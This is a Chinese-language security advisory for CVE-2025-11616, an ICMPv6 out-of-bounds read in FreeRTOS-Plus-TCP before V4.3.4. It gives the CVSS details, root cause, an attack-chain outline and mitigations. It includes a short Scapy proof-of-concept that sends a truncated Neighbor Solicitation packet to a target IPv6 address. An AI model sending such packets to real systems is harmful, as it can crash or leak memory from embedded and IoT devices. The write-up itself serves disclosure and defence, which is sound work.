CVE-2025-11616 FreeRTOS-Plus-TCP ICMPv6越界读取漏洞

漏洞信息

漏洞编号

CVE-2025-11616

漏洞类型

越界读取（Out-of-Bounds Read）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FreeRTOS-Plus-TCP

漏洞概述

CVE-2025-11616是FreeRTOS-Plus-TCP协议栈中ICMPv6数据包处理代码存在的一个安全漏洞。该漏洞源于代码中缺少对ICMPv6数据包的有效验证检查，当系统接收到某些特定消息类型但长度小于预期大小的ICMPv6数据包时，可能导致越界读取（Out-of-Bounds Read）操作。FreeRTOS-Plus-TCP是AWS维护的一款面向FreeRTOS操作系统的TCP/IP协议栈实现，广泛应用于嵌入式设备和物联网（IoT）产品中。该漏洞仅影响使用IPv6的网络通信功能，使用纯IPv4的应用不受影响。该漏洞的CVSS 3.1评分为5.4分，属于中危级别，攻击者需要具备低权限（PR:L）即可通过网络发起攻击，可能导致敏感信息泄露（机密性影响为低）和服务可用性降低（可用性影响为低）。AWS已于2025年10月发布安全公告AWS-2025-023，并发布了修复版本FreeRTOS-Plus-TCP V4.3.4，建议所有使用受影响版本的用户尽快升级到最新版本以修复该漏洞。

技术细节

该漏洞存在于FreeRTOS-Plus-TCP的ICMPv6数据包处理模块中。具体技术原理如下：

1. **根本原因**：在处理ICMPv6数据包时，协议栈代码未对传入数据包的最小长度进行充分验证。ICMPv6协议定义了多种消息类型（如Echo Request、Neighbor Solicitation、Neighbor Advertisement等），每种类型都有其特定的数据结构长度要求。

2. **触发条件**：当攻击者构造一个消息类型字段为合法类型，但实际数据包长度小于该类型所要求的最小结构长度的ICMPv6数据包时，协议栈内部的解析代码会按照预期结构大小读取数据，从而发生越界读取操作。

3. **利用方式**：攻击者通过网络（AV:N）向目标设备发送精心构造的恶意ICMPv6数据包。由于该漏洞需要低权限（PR:L），攻击者可能需要在目标网络内或已获得一定网络访问权限的情况下才能利用。攻击无需用户交互（UI:N），可自动化执行。

4. **影响后果**：越界读取可能导致程序读取到未初始化的内存或越界的内存区域，从而造成敏感信息泄露（机密性影响为低）。同时，异常读取可能导致程序崩溃或进入不稳定状态，影响系统可用性（可用性影响为低）。由于读取操作不修改内存，完整性不受影响（I:N）。

5. **修复方案**：在ICMPv6处理代码中添加对数据包长度的验证检查，确保在解析数据包内容之前验证其长度是否满足该消息类型的最小结构要求。

攻击链分析

STEP 1

步骤1：侦察与定位

攻击者通过网络扫描或信息收集，识别目标网络中运行FreeRTOS-Plus-TCP且启用了IPv6功能的嵌入式设备或IoT设备。

STEP 2

步骤2：获取网络访问权限

由于该漏洞需要低权限（PR:L），攻击者需要获得目标网络的访问权限，例如通过已入侵的内部设备、连接到同一局域网或通过其他方式获得网络层面的访问能力。

STEP 3

步骤3：构造恶意ICMPv6数据包

攻击者构造一个ICMPv6数据包，设置合法的消息类型字段（如Neighbor Solicitation类型135），但将数据包实际载荷长度截断至小于该类型所需的最小结构大小。

STEP 4

步骤4：发送恶意数据包

攻击者通过网络向目标设备的IPv6地址发送构造好的畸形ICMPv6数据包，触发FreeRTOS-Plus-TCP协议栈中的越界读取漏洞。

STEP 5

步骤5：触发漏洞

目标设备的FreeRTOS-Plus-TCP协议栈在处理该畸形数据包时，由于缺少长度验证检查，按照预期结构大小读取数据，导致越界内存读取，可能泄露敏感信息或导致设备不稳定/崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11616 - FreeRTOS-Plus-TCP ICMPv6 OOB Read PoC
# This PoC demonstrates crafting a malformed ICMPv6 packet
# that triggers an out-of-bounds read in FreeRTOS-Plus-TCP

from scapy.all import IPv6, ICMPv6EchoRequest, Raw, send, conf

# Disable verbose output
conf.verb = 0

def craft_malformed_icmpv6(target_ip, src_ip="fe80::1"):
    """
    Craft a malformed ICMPv6 packet with insufficient length
    to trigger OOB read in FreeRTOS-Plus-TCP's ICMPv6 processing code.
    
    The vulnerability is triggered when an ICMPv6 packet has a valid
    message type but a payload smaller than the expected minimum size
    for that message type.
    """
    # Create a minimal ICMPv6 Echo Request with truncated payload
    # Normal ICMPv6 Echo Request requires at least 8 bytes header
    # We craft a packet with type indicating a larger expected structure
    # but with insufficient actual data length
    
    # ICMPv6 Type 128 = Echo Request (requires 8 bytes header + variable data)
    # We send a packet that claims to be a larger ICMPv6 type
    # but with truncated payload
    
    # Build the malformed packet manually
    # Type: 135 (Neighbor Solicitation) - normally requires 24+ bytes
    # But we provide only minimal data to trigger OOB read
    malformed_type = 135  # Neighbor Solicitation
    malformed_code = 0
    
    # Create raw ICMPv6 with truncated data
    # Only provide 4 bytes instead of expected minimum
    raw_icmpv6 = bytes([malformed_type, malformed_code, 0x00, 0x00])
    
    # Construct IPv6 packet with the malformed ICMPv6 payload
    packet = IPv6(src=src_ip, dst=target_ip) / Raw(load=raw_icmpv6)
    
    return packet

def exploit(target_ip):
    """Send the malformed ICMPv6 packet to trigger the vulnerability"""
    pkt = craft_malformed_icmpv6(target_ip)
    print(f"[*] Sending malformed ICMPv6 packet to {target_ip}")
    print(f"[*] Packet type: Neighbor Solicitation (135)")
    print(f"[*] Payload size: 4 bytes (expected: 24+ bytes)")
    send(pkt)
    print("[+] Packet sent successfully")

if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_ipv6_address>")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)

影响范围

FreeRTOS-Plus-TCP < V4.3.4

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在网络层面部署防火墙或入侵检测系统（IDS），过滤和监控异常的ICMPv6数据包，特别是长度异常的数据包；2）对嵌入式设备进行网络隔离和分段，限制攻击者的网络访问范围；3）如果设备支持，临时禁用IPv6功能（如果业务允许），因为该漏洞仅影响IPv6通信；4）监控设备日志，关注异常的ICMPv6处理行为或设备崩溃事件；5）尽快制定升级计划，将FreeRTOS-Plus-TCP升级到V4.3.4或更高版本以彻底修复该漏洞。